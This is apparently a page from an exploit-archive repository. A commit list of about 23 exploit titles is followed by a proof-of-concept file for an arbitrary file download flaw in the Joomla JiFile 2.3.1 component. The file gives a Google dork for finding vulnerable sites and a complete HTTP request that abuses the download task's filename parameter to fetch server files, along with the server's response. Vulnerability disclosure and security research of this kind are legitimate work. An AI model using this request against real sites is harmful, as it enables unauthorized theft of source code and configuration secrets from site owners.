f3c28b3d62
23 changes to exploits/shellcodes SpotAuditor 3.6.7 - Denial of Service (PoC) SpotAuditor 3.6.7 - 'Base64 Encrypted Password' Denial of Service (PoC) SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC) Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter) DeviceViewer 3.12.0.1 - 'user' SEH Overflow Freefloat FTP Server 1.0 - 'SIZE' Remote Buffer Overflow Freefloat FTP Server 1.0 - 'STOR' Remote Buffer Overflow Moodle 3.6.3 - 'Install Plugin' Remote Command Execution (Metasploit) AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit) Pimcore < 5.71 - Unserialize RCE (Metasploit) Netgear DGN2200 / DGND3700 - Admin Password Disclosure Veeam ONE Reporter 9.5.0.3201 - Multiple Cross-Site Request Forgery Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-site Scripting (Add/Edit Widget) Intelbras IWR 3000N - Denial of Service (Remote Reboot) Joomla! Component ARI Quiz 3.7.4 - SQL Injection Intelbras IWR 3000N 1.5.0 - Cross-Site Request Forgery HumHub 1.3.12 - Cross-Site Scripting Spring Cloud Config 2.1.x - Path Traversal (Metasploit) Domoticz 4.10577 - Unauthenticated Remote Command Execution Joomla! Component JiFile 2.3.1 - Arbitrary File Download Hyvikk Fleet Manager - Shell Upload Agent Tesla Botnet - Information Disclosure Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
40 lines
No EOL
1.4 KiB
Text
40 lines
No EOL
1.4 KiB
Text
# Exploit Title: Joomla! Component JiFile 2.3.1 - Arbitrary File Download
|
|
# Exploit Author: Mr Winst0n
|
|
# Author E-mail: manamtabeshekan@gmail.com
|
|
# Discovery Date: April 28, 2019
|
|
# Vendor Homepage: http://www.isapp.it
|
|
# Software Link : https://extensions.joomla.org/extensions/extension/search-a-indexing/site-search/jifile/
|
|
# Dork: inurl:index.php?option=com_jifile
|
|
# Tested Version: 2.3.1
|
|
# Tested on: Kali linux, Windows 8.1
|
|
|
|
|
|
# PoC:
|
|
|
|
|
|
GET /web/index.php?option=com_jifile&task=filesystem.download&filename=index.php HTTP/1.1 <== YOUR FILE HERE
|
|
Host: TARGET
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: 7a9abe45881a5cc968ac0e7c857d8a72=6a377b3429e0b0c22c3abb8f3a078534
|
|
DNT: 1
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Sun, 28 Apr 2019 17:37:16 GMT
|
|
Server: Apache
|
|
Pragma: public
|
|
Cache-Control: must-revalidate, post-check=0, pre-check=0
|
|
Expires: 0
|
|
Content-Transfer-Encoding: binary
|
|
Content-Disposition: attachment; filename="index.php"; modification-date="1418190008"; size=1319;
|
|
Set-Cookie: c90ff18cda17f7cf5069ad1e830756c6=9a1f1c7e9bc241c66e7ad65ca0dd7624; path=/; secure
|
|
Content-Length: 1319
|
|
Connection: close
|
|
Content-Type: application/x-php
|
|
|
|
FILE_CONTENT |